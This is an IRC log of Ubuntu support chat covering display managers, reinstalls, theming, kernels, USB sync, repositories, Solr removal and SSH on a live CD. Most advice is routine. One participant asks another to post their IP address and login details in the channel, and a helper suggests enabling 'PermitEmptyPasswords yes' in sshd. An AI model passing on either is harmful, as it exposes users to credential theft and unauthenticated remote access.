lotuspsychjeAscavasaion: paste that error to EriC^^ he might have a clue on that uefi issue07:12
WillzorAnd you agree i came to an IRC for UBUNTU knowing thats what the back end is on this but yet you dont want to help?07:12
lotuspsychjeWillzor: again, its not me that doesnt wanna help, we have rules here..if you dont agree the !guidelines, please ask in #ubuntu-ops please07:12
ducasseWillzor: we don't know what changes have been made from plain ubuntu, so we don't even attempt to support it to avoid mistakes.07:13
WillzorAll im having is issues with my video drivers thats it, ive tried everything i could think of07:14
lotuspsychjeWillzor: install ubuntu and you might have a much better driver experience07:14
WillzorI just like the UI i dont know how to make normal Ubuntu look and feel like this one does07:15
lotuspsychjeWillzor: install ubuntu and we will help you tweak your theme07:15
k12So... after following that link, the sudo tee method was a failure, and so was the update-rc.d. I will not be restoring the display-manager by installing more unwanted packages.07:16
WillzorTo almost look like this one? i dont know how thats possible07:16
lotuspsychjeWillzor: what does it look like?07:17
Willzorhttps://www.makululinux.com/wp/lindoz/07:17
k12It's starting to look like it's impossible to enable display managers, only disable them.07:17
=== Budgii_ is now known as Budgii
lotuspsychjeWillzor: we have ubuntu users that experimenten with cinnamon before..07:18
WillzorSo you can get the icons and start menu to look like that?07:19
lotuspsychjek12: you havent explained yet what and how you trying to do?07:19
lotuspsychjeWillzor: i dont see why you cant make ubuntu look like cinnamon or lindoz with themes07:20
k12lotuspsychje: I'm trying to enable gdm3.07:20
k12I've searched for an hour by now for the solution to my problem, and nothing is appearing.07:20
lotuspsychjek12: gdm is installed by default when you install a destop envoriment07:20
lotuspsychjek12: dont you have  a DE installed?07:20
k12Yes, and then I switched from gdm3 to lightdm.07:20
WillzorThat start menu is very custom thats one of the reasons i picked it07:20
lotuspsychjek12: explain first07:21
k12Then lightdm got screwed up, and so I disabled the display manager and then that's when all this crap started becoming a problem.07:21
WillzorIs there anyway to fork it per say to work correctly once i move over?07:21
lotuspsychjek12: lets start from the start: ubuntu version please?07:21
k12someone says to try dpkg-reconfigure gdm, I'm going to try that, and hopefully it works.07:21
k1217.1007:21
lotuspsychjek12: gdm3 is installed by default on 17.1007:22
lotuspsychjeWillzor: forking lindoz Os to ubuntu?07:22
WillzorYea07:23
ducasseWillzor: their support seems to be here - https://www.makululinux.com/wp/forums/07:23
lotuspsychjeWillzor: you dont fork an Os just to make it look like you want07:23
WillzorNo one responds there.07:23
k12I just said that I switched from gdm3 to lightdm, and then I messed that up while trying to do some configuring. Lightdm started repeatedly and repeatedly starting over and over again, because it sucks, and then I had to reboot and go into my ubuntu Live USB, and disabled the display manager.service.07:23
WillzorThats a dead forum07:23
k12That's when all this started.07:23
lotuspsychjek12: why did you install lightdm when you had gdm for start?07:24
k12Because I liked how I could customize lightdm's gtk greeter, or choose other greeters like webkit or kde.07:24
lotuspsychjek12: then keep using 16.04 lts?07:25
k12-_-07:25
lotuspsychjek12: if i was you i would reinstall clean07:25
lotuspsychjek12: or the hard way: fix broken packages from recoverymode?07:25
WillzorWhere do i find ubuntu cinnamon?07:25
k12Yeah, no. I shouldn't have to reinstall, I should be allowed to enable/disable display managers using systemctl like I can on debian, fedora, arch, or any other distro. But fsr it's only ubuntu where this is such a problem.07:26
lotuspsychjeWillzor: cinnamon isnt installed by default on ubuntu flavors07:26
k12Anyway, going to try that dpkg solution. If that fails, I give up.07:26
lotuspsychje!info cinnamon | Willzor optional07:27
ubottuWillzor optional: cinnamon (source: cinnamon): Innovative and comfortable desktop. In component universe, is optional. Version 3.4.6-1 (artful), package size 315 kB, installed size 1305 kB07:27
lotuspsychjemorning MonkeyDust07:27
MonkeyDustlotuspsychje07:27
WillzorSo just install normal Ubuntu and come back here and you all can help me?07:27
lotuspsychjeWillzor: sure mate07:27
lotuspsychjeWillzor: we reccomend you to use ubuntu on daily base07:27
lotuspsychje!download | Willzor07:28
ubottuWillzor: Ubuntu installation CDs can be downloaded from http://releases.ubuntu.com - Mirrors can be found at https://wiki.ubuntu.com/Mirrors - PLEASE use the !torrents to download !Artful, and help keeping the servers' load low!07:28
k12Because at that point, unless proven wrong by some advanced ubuntu user, I will have come to the conclusion that it's literally impossible to reenable a display manager on this distro once you've disabled display-manager.service.07:28
Pan51k12: i hosed my 16.4 real bad, i was going to reinstall, and decided on 18.4 and it let me upgrade my 16.4 and it fixed all my problems07:28
WillzorGo to 17.10? and is there a command to list what all i have installed on here to get it on the fresh install?07:28
lotuspsychje!info aptoncd | Willzor07:29
ubottuWillzor: aptoncd (source: aptoncd): Installation disc creator for packages downloaded via APT. In component universe, is optional. Version 0.1.98+bzr117-1.4 (artful), package size 213 kB, installed size 1561 kB07:29
k12I'm probably just going to return to arch if this doesn't work. Because as tough as arch is, at least this display manager issue is completely non-existent as long as x.org is completely installed.07:29
EriC^^Willzor: comm -23 <(apt-mark showmanual | sort -u) <(gzip -dc /var/log/installer/initial-status.gz | sed -n 's/^Package: //p' | sort -u) > /path/to/installedpackages07:29
k12installed properly *07:29
lotuspsychjek12: just purge lightdm and try recoverymode fix broken packages?07:30
WillzorIm confused on those commands07:30
EriC^^Willzor: the whole line is the command, just replace /path/to/installedpackages with the path you want07:31
WillzorIm just trying to list what all is installed on here so once i get over i can copy it07:31
EriC^^Willzor: that's what it does07:32
ducassek12: create a symlink from /lib/systemd/system/lightdm.service to /etc/systemd/systemd/display-manager.service07:32
k12nvm it worked.07:33
Willzorthis is the error /var/log/installer/initial-status.gz: No such file or directory07:34
k12After I ran dpkg-reconfigure blah blah blah I found out where all the .service files are, and just created a symlink manually.07:34
k12Finally got it working.07:34
EriC^^Willzor: "dpkg --get-selections > /path/to/installedpackages" works too07:35
k12ducasse: yep, tried that, and that fixed it. Would be nice for the ubuntu devs to make it so I could do that automatically through systemctl though, rather than have to manually create one.07:35
EriC^^Willzor: just it lists everything, even dependencies07:35
k12But finally, the display manager loads on boot. -_- I can finally rest peacefully.07:35
lotuspsychjek12: devs are not responsable for what users try to do07:36
EriC^^Willzor: maybe "apt-mark showmanual" is better, i'm not sure though07:37
ducassek12: it seems the .service files now need a new [Install] section added to them for systemctl enable to work, guess that needs to be done still07:37
Willzorapt-mark showmanual: command not found07:38
k12lotuspsychje: yeah, sure. Has nothing to do with "what users try to do", it's basic functionality that we can't have on Ubuntu, but literally every distro ever. Anyway, I found my solution, I'm moving on.07:38
k12ducasse: ah. I suppose that makes sense.07:38
EriC^^Willzor: hmm, what does 'dpkg -l apt' show?07:39
EriC^^and "ls -l /usr/bin/apt-mark" ?07:39
Willzordpkg -l apt: command not found07:40
EriC^^Willzor: how about "ls -l /usr/bin/dpkg" ?07:40
lotuspsychjek12: just out of curiosity, why did you try switch display managers instead of switching DE's?07:40
ducassek12: it's a new requirement in newer systemd versions, probably takes a little while for all the packages to catch up07:40
Willzor "ls -l /usr/bin/dpkg"  bash: ls -l /usr/bin/dpkg: No such file or directory07:41
ducasseWillzor: don't type the quotes07:41
Willzorls -l /usr/bin/dpkg  -rwxr-xr-x 1 root root 278264 Mar 14 15:44 /usr/bin/dpkg07:41
EriC^^Willzor: ok, try 'apt-mark showmanual > /tmp/packageslist'07:42
EriC^^without quotes07:42
k12lotuspsychje: because prior to that, I knew how to configure lightdm far better than gdm3, and I didn't want to configure gdm3, because apparently that's done by editing config files, whereas there's lightdm-gtk-greeter-settings for lightdm-gtk-greeter.07:42
WillzorNothing at all07:42
k12I guess I'll keep searching for a configuration tool for gdm3.07:42
EriC^^Willzor: ok 'cat /tmp/packageslist'07:43
WillzorThats listing a lot of stuff07:44
EriC^^Willzor: those are the manually installed packages07:45
WillzorThe repos cant i take them and use it on the normal Ubuntu?07:45
lotuspsychjeWillzor: bad idea07:45
Willzorlindoz-applets lindoz-backgrounds lindoz-mouse-cursors lindoz-theme-icons-extra lindoz-theme-windows-10 lindoz-theme-windows-7 lindoz-theme-windows-8 lindoz-theme-windows-classic lindoz-theme-windows-vista lindoz-theme-windows-xp07:45
lotuspsychjeWillzor: no, dont do that at all07:46
Ascavasaiontomreyn: Are you around?07:46
lotuspsychjeWillzor: make your life easy, install a supported ubuntu version from our topic then come back here07:47
lotuspsychjeAscavasaion: paste that error to EriC^^ he might have a clue07:47
WillzorI will whats a good USB tool?07:47
EriC^^Willzor: dd07:47
lotuspsychjeEriC^^: Ascavasaion got a freeze after installing ubuntu with an uefi warning db07:48
WillzorWhats the full name? im getting a lot of other things07:48
EriC^^Willzor: the command is "sudo dd if=/path/to/iso of=/dev/sdX bs=4M && sync"07:49
EriC^^replace /dev/sdX with your usb name from 'sudo parted -ls'07:49
WillzorAnything with a GUI? :(07:49
lotuspsychje!usb | Willzor07:49
ubottuWillzor: For information about installing Ubuntu from USB flash drives, see https://help.ubuntu.com/community/Installation/FromUSBStick - For a persistent live USB install, see: https://wiki.ubuntu.com/LiveUsbPendrivePersistent07:49
mahdihi07:50
EriC^^Ascavasaion: restate your issue if you want07:50
WillzorNow should i get 17.10 or 16?07:52
EriC^^Willzor: 16.04.407:52
mahdi_anyone ?07:53
EriC^^Willzor: 5 years support, it's up to you07:53
MonkeyDustmahdi  hi, this is ubuntu support, ask your question07:55
=== marve is now known as Guest28140
mahdihow can i delete an icon from the dash ?08:00
AscavasaionEriC^^: I did an Ubuntu 16 installation... it stated that it was finished and time to reboot.  I hit reboot... it dropped out of GUI and in text it said something bout firmware error... I Googled and advice was "sudo apt-get install intel-microcode".  I did that.  Then I got "MODSIGN: Couldn't get UEFI db list" and it froze... I eventually hit the reset button and it has not done it since.08:01
lotuspsychjemahdi: on your mouse there's a right button, click on your icon and remove08:01
WillzorAlright im installing ill be back very soon08:02
mahdilotuspsychje: it dosen't have anything for removing something08:02
choicedoes anybody who use ibus under ubuntu?08:02
lotuspsychjeWillzor: great, welcome to the ubuntu community08:03
lotuspsychje!ask | choice08:03
ubottuchoice: Please don't ask to ask a question, simply ask the question (all on ONE line and in the channel, so that others can read and follow it easily). If anyone knows the answer they will most likely reply. :-) See also !patience08:03
mahdi!parience08:04
choice:D, got that. I found that ibus not always works under ubuntu08:04
mahdi!patinence08:04
choicewhen i use ibus , it could work very well when use browser, shell, but not work under intellij phpstorm/Idea08:05
choicebut fcitx works fine08:05
MaraketHey all, just had the biggest headache installing Ubuntu 16.04 on a new laptop, a Metabox N850HJ-i5, using the normal installer and unetbootin to create a bootable USB seemed to work so far as getting it installed, at the end of the install it would hang but seemed to install the OS, then when trying to login, would get past the login screen only to hang, couldn't change to any of the tty screens as that would hang, same result08:05
Maraketwith 17.10, then tried the mini editions as per https://help.ubuntu.com/community/Installation/MinimalCD which seemed to work just fine (Gnome had some screen flickering but that was solved changing to nVidia drivers), though NO wifi, after much googling, and reading through dmesg, the big issu, was running Kernel 4.4, so an update later and no wifi, sharing this out of frustration and sure it should be fixed in 18.04 with the08:05
Maraketnew minimal option but thought i would share08:05
choicebut it looks fcitx is not a original input method for ubuntu( Just my feeling)08:06
Maraketnormal installer being the standard x64 iso08:06
lotuspsychjeMaraket: do you really need minimal?08:07
=== apsknight1 is now known as apsknight
Maraketlotuspsychje: no, it was the only work around I could get it to get past the login screen, I suppose I could have used the live usb to check the logs and figure from there, but only thought of that now :P08:08
WillzorDoes this mean my Broadcom will work on the current Kernal now?08:08
lotuspsychjeMaraket: if your graphics result in black screen try !nomodeset08:09
lotuspsychjeWillzor: for making broadcom work, you need the restricted-extras08:09
EriC^^Ascavasaion: https://ubuntuforums.org/showthread.php?t=2380700&p=13732697#post1373269708:09
Maraketlotuspsychje: wasn't the exact issue, it wouldn't load up any of the icons or anything, it seemed to just sit on the background with the cursor, and nothing else08:09
lotuspsychjeMaraket: what kind of graphics do you have?08:10
Maraketlotuspsychje: GTX 1050, though unsure why the minimal would work when the full wouldn't (mind you the full also did do updates during install, and tried without updates as well)08:11
lotuspsychjeMaraket: for making that card work you might have to enter !nomodeset first08:11
Maraketlotuspsychje: something to try in the future, got it working now so I'm happy :P08:12
lotuspsychje!bug | Maraket feel free to report when you find one08:13
ubottuMaraket feel free to report when you find one: If you find a bug in Ubuntu or any of its derivatives, please report it using the command « ubuntu-bug <package> » - See https://help.ubuntu.com/community/ReportingBugs for other ways to report bugs.08:13
Maraketlotuspsychje: I normally would, but the issue is I have no idea what the issue was with, if it was indeed the graphic driver, or something else, I suppose I could do further testing now I know A solution, but for now I am a little beat :) will check into it in the future and see if 18.04 LTS has the same issues. If it does I'll most definitely do a thorough investigation and share what I find08:14
lotuspsychjeMaraket: allrighty, glad you solved it08:15
david__hello some german speaking people here?08:19
MonkeyDust!de08:19
ubottuIn den meisten Ubuntu-Kanälen wird nur Englisch gesprochen. Für deutschsprachige Hilfe besuche bitte #ubuntu-de, #kubuntu-de, #edubuntu-de oder #ubuntu-at. Einfach "/join #ubuntu-de" eingeben. Danke für Dein Verständnis!08:19
MaraketI know this is purely subjective, but which channel would be the best to ask people of which Desktop Environment should I go with since I am not a huge fan of Unity08:25
lotuspsychje!flavors | Maraket08:25
ubottuMaraket: Recognized Ubuntu flavors build on Ubuntu and provide a different user experience out of the box. They are supported both in #ubuntu and in their flavor channel. For a list, see https://www.ubuntu.com/download/ubuntu-flavours08:25
EriC^^Maraket: #ubuntu-offtopic08:28
EriC^^Maraket: or #ubuntu-discuss08:28
WillzorAlright im back08:33
WillzorWhats the first step for this?08:34
WillzorAnyone?08:37
=== sudheendra_ is now known as sudheendra
guivercfirst step for ??   (people come and go...)08:39
guivercWillzor, (sorry see last msg)08:40
EriC^^Willzor: type "sudo parted -ls" and get the name of the USB08:40
EriC^^/dev/sd..08:40
WillzorIts already Ubuntu08:40
WillzorALready reinstalled08:40
EriC^^Willzor: what are you asking exactly?08:41
steenmanhow do i begin troubleshooting my lubuntu server which crashed this morning (it didnt respond to a ping) so i physically restarted it...08:41
WillzorThe reason i moved over was someone said they can help me make this Ubuntu look like the other OS i used08:41
EriC^^steenman: look into "/var/log/kern.log"08:41
steenmanwhats the linux equivalent of event viewer :)?08:41
steenmanok08:42
steenmanthxs08:42
EriC^^steenman: no problem08:42
Willzor_Sorry firefox crashed08:43
steenmanthere are only two entries in the log from before the crash08:45
EriC^^!paste | steenman08:45
ubottusteenman: For posting multi-line texts into the channel, please use https://paste.ubuntu.com | To post !screenshots use https://imgur.com/ !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic.08:45
willzor__http://www.makululinux.com/wp/lindoz/ thats the site of the OS i was using08:45
steenmani suppose i dont know it crashed just i coulnd ping08:46
EriC^^willzor__: maybe restate your question and someone might pick up the question08:46
steenmanok ubottu08:46
willzor__I did, someone told me once i get Ubuntu installed theyll help me make it like this the other person was helping me with you08:47
=== willzor__ is now known as willzor
steenmanEriC^^: the log does not go back far enough08:47
ducassewillzor: no, we said you could get support here08:48
EriC^^steenman: try /var/log/kern.log.108:48
willzorHmm someone said theyll help me get it almost just like that one once i fishing reinstalling08:48
steenmanah yes08:49
willzorWith themes and such, i dont have logs that go back that far or i would know the person who said it08:49
steenmanit doesnt seem to catergorise events in this file08:51
willzorSo no one can help me?08:51
EriC^^willzor: ask the question fully, every 10mins or so and see08:51
willzorI dont know where to begin that other person knew more about what steps i needed then i do08:52
EriC^^steenman: yeah, you want to look for errors and such, maybe 'grep -i error /var/log/kern.log.1'08:52
EriC^^willzor: how about 'i'm trying to make my ubuntu look like xxxx os, can anyone help?'08:52
willzorWho was it that said good morning to you i remember that was the one who said they know a good bit and willing to help once i get over to Ubuntu08:53
ducassewillzor: you're thinking of lotuspsychje, but he's afk right now08:54
willzorIm on Ubuntu and trying to make my OS look more like the Makululinux Lidoz Heres the site http://www.makululinux.com/wp/lindoz/ Anyone willing to help me try and setup my system like that please?08:55
willzorYea thats the person08:56
brainwashwillzor: I would ask the dev(s) of Lindoz about how their customizations08:57
willzorSo really i just reformatted for nothing is what your saying. as someone told me i could get help after i did XYZ and ive done XYZ but now i gotta go threw even more hoops just to get it figured out?08:59
ericrajuinit's just the icons and themes08:59
brainwashwillzor: why did you format your previous installation?09:00
willzorBeacuse i was told too?09:00
brainwashyeah... no, that's not how it works09:01
brainwashwhat is the reason?09:01
brainwashlike, did you install an outdated ubuntu release?09:01
willzor"we dont support that Discro install ubuntu and we will help you"09:02
brainwashthat's an obvious requirement if you want support from this channel09:02
brainwashin case you did not have ubuntu installed before09:02
willzorI did have it but wasnt a dummbed down version09:03
EriC^^with that logic, you should also ask in #debian cause ubuntu is based on that09:03
EriC^^possibly #kernel too09:03
EriC^^:D09:04
brainwashso, you have to install the Cinnamon DE (sudo apt install cinnamon), and then try to obtain the resources (wallpapers, icons, themes,..) from LinDoz09:04
brainwashwe can't really help with the second part09:05
ericrajuinand lxpanel09:05
ericrajuinno nvm it's not09:05
=== V7 is now known as VjdfMQ
=== apsknight1 is now known as apsknight
widpIs neomutt available as a package for 16.04?09:34
widpIf it's not how do i get it?09:34
guiverci only see it for bionic widp https://packages.ubuntu.com/search?keywords=neomutt09:34
widpWhat's bionic?09:34
guiverc18.0409:35
widpI see.09:35
widpSo no 16.04 package, I am not sure how I feel about this.09:35
widpOn the one hand I've spent the entire day playing around with configs , now it has led to the point where I might finally have to upgrade.09:36
widpIf only there was a ppa available.09:37
guivercmaybe you could ask on #neomutt - but I know nothing about neomutt  (hadn't heard of it before your question)09:37
=== imadz714 is now known as imadz713
=== sudheendra_ is now known as sudheendra
jlucon ubuntu 17.10n why is it i cant install neither gwenview nor gpicview ?09:43
jlucnor gthumb09:45
jluc"no available version"09:46
brainwashcould it be that the 'universe' repo is disabled?09:46
brainwashcheck "apt-cache policy"09:46
brainwashhttps://help.ubuntu.com/community/Repositories/Ubuntu09:49
jluci added "deb http://archive.ubuntu.com/ubuntu/ artful main restricted universe multiverse" to sources.list09:51
widphow long does upgrading from 16.04 to 18.04 take?09:51
widpshould I expect a lot of breakage?09:51
brainwashit will take a while09:51
BluesKajHi folks09:52
brainwashwidp: I doubt that you can answer that question with a simple yes or no09:53
guivercwidp, 18.04 hasn't been released yet so currently is offtopic on this site (it's channel is #ubuntu+1)09:53
widpI see.09:53
guivercs/site/channel/09:53
widpI wonder when 16.04 was released.09:54
jluc2016 0409:54
guiverc(year.month is the ubuntu release version numbering)09:54
=== martijn is now known as m4rtijn
widpI see.09:56
=== imadz714 is now known as imadz713
sweb1safely remove on USB storage like flash or external hdd is take very long time to affect. how can i report it ? Ubuntu 18.04 (development branch)09:59
guivercsweb1, 18.04 channel is #ubuntu+1, so you could ask there. the obvious answer is looking for a bug (report) on launchpad or raising one...10:03
EriC^^sweb1: sometimes if you copied a lot of data to it, it'll take a lot of time while it syncs (when it's actually copying the data there)10:10
EriC^^sweb1: if you haven't copied anything to it and it takes a lot of time, something is wrong10:10
sweb1EriC^^: i hade another laptop with ubuntu 16.04 same hardware it's sync fast ... as usual ... but this is take very long time about 30 minutes10:10
EriC^^that's a lot10:13
=== marve is now known as Guest96765
jlucsweb, i improved a lot sync time10:16
jlucfollowing some advice in https://unix.stackexchange.com/questions/180818/gnome-nautilus-copy-files-to-usb-stops-at-100-or-near10:16
jlucalso see http://lwn.net/Articles/572911/10:16
jlucedit /etc/sysctl.conf and add "vm.dirty_background_bytes = 16777216" and "vm.dirty_bytes = 50331648"10:17
kunjiHow do I install go (or git2go?) on Ubuntu such that "go get some/github/repo" works?  I installed the go snap via "sudo snap install go --classic" and when I try the above I get "# github.com/libgit2/git2go go/src/github.com/libgit2/git2go/blame.go:4:18: fatal error: git2.h: No such file or directory"10:19
jlucbrainwash, here is my apt-cache policy : http://pastebin.fr/5337010:19
jlucdoes it show something to repair ?10:20
jluchmm id did some preferences edit once - that's probably the issue10:21
ericrajuinafter I compiled something is it safe to remove the -dev packages ?10:22
jlucrm /etc/apt/preferences10:28
jlucmight fix my issue10:28
kunjiericrajuin: Should be, but won't you just need them again to compile the next time?10:30
jlucyes fixed10:32
ericrajuinoh I didn't thought of that10:33
s10gopalevery file has an extension , what will be the extension if  file is created by "$touch file"10:35
_Strix_hello10:37
_Strix_Can anyone please help me how to find when the kernal was last updated?10:38
lotuspsychje_Strix_: check dpkg logs10:39
_Strix_I am using ubuntu 14.0410:39
lotuspsychje_Strix_: uname -a to see your current kernel10:39
jluc"touch file" will create "file" file lol, along with its extension when there is one s10gopal10:39
_Strix_Linux 4.13.13-4-pve10:40
s10gopalif we dont provide any extension what is default extension ? is touch file and touch file.txt are same ?10:41
ducasses10gopal: nothing, there is no default extension10:41
brainwashjluc: so, you were able to activate artful/universe?10:41
guivercs10gopal, *nix doesn't use extensions by default.  a file [type] is determined by its contents, not the part of its name  - use `file filename` to see what a filetype is for filename10:42
ShriHari<s10gopal> touch file and touch file.txt are not same10:42
_Strix_lotuspsychje, current kernal is Linux 4.13.13-4-pve10:42
VjdfMQHey all10:42
VjdfMQI've added ufw and added rules:10:42
lotuspsychje_Strix_: yes?10:42
_Strix_I am not finding anything in dpkg.log10:43
_Strix_about kernal10:43
VjdfMQSo, now an internet doesn't work10:43
VjdfMQhttps://hastebin.com/igubexutup.http10:43
lotuspsychjeVjdfMQ: perhaps #netfilter can help?10:43
VjdfMQThe Internet *10:43
VjdfMQThank you lotuspsychje10:44
s10gopalthx10:44
ShriHari<VjdfMQ> give your ip address & login details10:45
ericrajuinI think the kernel packages are named "linux-headers" and "linux-image" something10:45
VjdfMQwhat a ?10:45
VjdfMQericrajuin: Also linux image extra10:45
ericrajuinVjdfMQ : I think the ufw rules need to allow outbound connections as well10:53
ericrajuinjust a guess10:53
s10gopalhow to intall kernel 4.9 on ubuntu 14.04 lts10:56
helpmeso after some update i now boot into purple screen and it freezes.. there was some mention of uefi something the first time of booting after the update.. what might it be? it's ubuntu 16.0410:56
s10gopal  linux-headers-4.9.0-040900_4.9.0-040900.201612111631_all.deb       linux-headers-4.9.0-040900-generic_4.9.0-040900.201612111631_amd64.deb             linux-image-4.9.0-040900-generic_4.9.0-040900.201612111631_amd64.deb   only these files are required to download ?10:57
guivercs10gopal, where are the 4.9 [kernel] from?  i don't see 4.9 in the support kernels on https://wiki.ubuntu.com/Kernel/Support11:00
guivercs/support kernels/supported kernels/11:00
s10gopalhttp://kernel.ubuntu.com/~kernel-ppa/mainline/v4.9/11:00
s10gopalguiverc, i want to test ml 4.9 on ubuntu 14.04 lts11:02
TyrfingMjolnirI booted from the live CD11:03
TyrfingMjolnirI installed openssh-server this is enabled11:03
TyrfingMjolnirWhat is the default username and password?11:03
=== marve is now known as Guest91849
TyrfingMjolnirubuntu/ubuntu no go11:03
guivercs10gopal, maybe look at http://ubuntuhandbook.org/index.php/2016/12/install-linux-kernel-4-9-ubuntu-linux-mint/ -- but i've not used it11:04
ppfTyrfingMjolnir: should be ubuntu, no pwd11:04
s10gopalguiverc, thx11:05
codecutterdo i need to do anything after using 'sudo rm /etc/init.d/solr'?11:07
codecutterapparently i should have used this instead 'You are missing this, if you want to re-install it again. sudo update-rc.d -f solr remove and sudo rm -rf /etc/default/solr.in.sh '11:07
ppfmaybe  update-rc.d solr remove11:07
codecutterright11:07
codecutteri already used the command11:07
codecutterppf11:08
TyrfingMjolnirppf: Ubuntu/ also no good11:08
ppfcodecutter: okay?11:09
codecutteri used ''sudo rm /etc/init.d/solr''. instead of ' update-rc.d -f solr remove'11:09
ppfTyrfingMjolnir: why, what happens if you try?11:09
ppfcodecutter: yeah those don't do the same thing11:10
ppfbut provide some context for me please, what are you trying to do exactly?11:10
codecutterppf: remvoed solr manually https://askubuntu.com/questions/680690/how-to-uninstall-solr11:10
iBurger21hey all: I'm sorry if this has been asked 100x times before. But as an end-user, what are the main benefits of running ubuntu over debian?11:11
ppfcodecutter: okay, and what's the issue?11:11
lotuspsychjeiBurger21: #ubuntu-discuss please11:11
iBurger21okay11:11
codecutterppf: i used ''sudo rm /etc/init.d/solr''. instead of ' update-rc.d -f solr remove', how do i fix this?11:12
ppfrun update-rc.d -f solr remove11:12
TyrfingMjolnirppf: Permission denied, please try again.11:13
codecutterbut i already removed it using ''sudo rm /etc/init.d/solr'' ?11:13
ppfthat's not what update-rc.d does11:13
codecutterwhats the diff between these 2 commands?11:13
ppfupdate-rc.d manages symlinks between /etc/rc$N.d and the init files11:14
codecutterah11:14
codecutternow i need to reinstall the latest version, installed previous manually, is there a apt-get version available for solr11:15
codecutter?11:15
ppf!info solr11:15
ubottuPackage solr does not exist in artful11:15
codecutterhmm11:16
ppf!info solr-tomcat11:16
ubottusolr-tomcat (source: lucene-solr): Enterprise search server based on Lucene3 - Tomcat integration. In component universe, is optional. Version 3.6.2+dfsg-10+deb9u1build0.17.10.1 (artful), package size 7 kB, installed size 37 kB11:16
codecutteri need solr v.711:16
ppfcodecutter: then you'd probably best install from source11:17
ppfcodecutter: what is your endgame though11:18
ppfyou just wanna run that server?11:18
codecutterstandalone11:18
ppfthen why not use docker11:18
codecutteri don't have docker setup11:19
codecutterdon't ask me to setup docker only for solr11:19
codecutter:)11:19
codecutterthis is what they call a preemptive response :11:20
TyrfingMjolnirpeople still use solr? There is elastic.co11:20
codecutteri'm already using solr, why would i want to change it? do you have a compelling reason?11:20
TyrfingMjolnirI never really had any compelling reason to use any java project11:21
ppfcodecutter: what's there to set up11:21
TyrfingMjolnirI do use elasticsearch and beats though...11:21
TyrfingMjolnircodecutter: Why not compile from source?11:21
codecutterwell, elastic appears to be commerical?11:21
VjdfMQericrajuin: What do you mean ?11:22
codecutteri guess what i'll have to do11:22
TyrfingMjolnircodecutter: es is open source, some of the plugins are commerical11:22
VjdfMQThey're already opened. Arent they ?11:22
codecutter"Deploy a 14-day trial with 4 GB RAM, 96 GB storage, Kibana, X‑Pack, and more.'11:22
codecutteri see11:22
TyrfingMjolnircodecutter: I never did that11:22
TyrfingMjolnirI registered and that allows me to run elasticsearch, kibana, logstash, and beats for free11:23
TyrfingMjolnirOne thing I did do however is to install free plug-ins11:23
TyrfingMjolnirThere are also commercial plugins11:23
TyrfingMjolnirThen again the free version supposedly exceeds solr11:24
TyrfingMjolnirin features11:24
jlucbrainwash, i could install yes11:24
ppfand use docker for either11:24
TyrfingMjolnircodecutter: What is your project?11:25
GasterFQHi, i have a question about LTS, when will Canonical launch the new LTS?11:25
ppf(or whatever your favorite container orchestrator is)11:25
cfhowlett!isitout | GasterFQ11:25
ubottuGasterFQ: Not yet!11:25
jlucremoving /etc/apt/preferences cleaned the situation11:25
ppfGasterFQ: soon! (tm)11:25
GasterFQThanks!11:25
TyrfingMjolnir18.04, no?11:25
codecutterTyrfingMjolnir: search for user accounts and companies11:26
TyrfingMjolnircodecutter: Where?11:26
codecuttermy own server11:26
TyrfingMjolnir?11:27
TyrfingMjolnirLink?11:27
codecuttermaybe later, its down at the moment11:28
codecutterinstalling solr :)11:28
=== jstein_ is now known as jstein
ppfTyrfingMjolnir: could be that sshd is forbidding passwordless connections11:32
ppfeither set 'PermitEmptyPasswords yes' or give the user a password11:32
TyrfingMjolnirppf: It says something about pass not installed and will have to add universe11:33
ppfpasswd11:33
TyrfingMjolnirIt says passwd not installed and will have to do apt install pass from universe11:34
cvdd43hye11:35
ppfTyrfingMjolnir: ?11:35
ppf!info passwd11:36
ubottupasswd (source: shadow): change and administer password and group data. In component main, is required. Version 1:4.2-3.2ubuntu4 (artful), package size 771 kB, installed size 2454 kB11:36
ppfthat's neither universe nor not installed11:36
cvdd43any one here11:36
cvdd43 not installed11:36
cvdd43ithink so ??11:36
cfhowlett!details | cvdd43,11:37
ubottucvdd43,: Please elaborate; your question or issue may not seem clear or detailed enough for people to help you. Please give more detailed information; for example, we might need errors, steps, relevant configuration files, Ubuntu version, and hardware information. Use a !pastebin to avoid flooding the channel.11:37
cvdd43what :)11:37
=== mkv is now known as m4v
cfhowlettthis is ubuntu support.  please stay on topic.11:38
cvdd43who is from U.S.A11:39
TyrfingMjolnirNobody wants to admin, cvdd4311:40
TyrfingMjolnirHow can I turn off hibernation?11:41
cvdd43what11:41
cvdd43????11:41
TyrfingMjolnirI just lost the IP address11:41
cvdd43ip of what??11:41
TyrfingMjolnirof the live CD running11:41
TyrfingMjolnirDue to hibernation11:42
cvdd43oh!!11:42
cvdd43can any one tech me how to use hex chat11:42
cvdd43because today its my first day to use it11:43
cfhowlettcvdd43, you are already using it.11:43
cvdd43i know but11:43
TyrfingMjolnirThere is no exa?11:43
TyrfingMjolnirWhat is hex chat?11:43
TyrfingMjolnirapt-get install exa11:44
TyrfingMjolnirE: Unable to locate package exa11:44
cfhowlettcvdd43, and, amazingly, there's actually a <Help> topic in hexchat with complete instructions!11:44
alfepualguien sabe algun canal en espaöol11:44
cfhowlett!es | alfepu11:44
ubottualfepu: En la mayoría de los canales de Ubuntu, se habla sólo en inglés. Si busca ayuda en español entre al canal #ubuntu-es; escriba " /join #ubuntu-es " (sin comillas) y presione intro.11:44
cvdd43when i exit it and return to open it all the channels disappeared11:44
cvdd43so i use to put them all again11:44
cfhowlettbecause you didn't set up the channels.  Read the help menu, it's explained there11:45
cvdd43how to set up them11:45
cvdd43??11:45
=== imadz714 is now known as imadz713
cvdd43please help!!11:47
cfhowletthttps://hexchat.readthedocs.io/en/latest/    <<< read the friendly manual11:47
TyrfingMjolnircfhowlett: I doubt cvdd43 cares if there is one; probably you can tell him/her where it is.11:47
cvdd43yes iwill now11:47
cfhowletthttps://hexchat.readthedocs.io/en/latest/faq.html#how-do-i-autoconnect-and-join-a-channel-on-start11:48
cvdd43yes thanks so much chfhowlett11:49
cfhowletthappy2help! and welcome to *buntu11:49
Ascavasaiontomreyn: Are you here?11:50
ericrajuinthe livecd username login is livecd I believe11:51
TyrfingMjolnircvdd43: What's wrong with irssi?11:51
cvdd43just asecond11:52
cvdd43it doesnt work11:55
luxiotheres a bug where when im resizing a window a black box flashes around it11:55
luxiois this known11:56
TyrfingMjolnirA black box flashes around what?11:56
cvdd43 who have kali linux here11:57
cfhowlettno one. this is ubuntu support.  kali is not supported11:58
cvdd43yes11:58
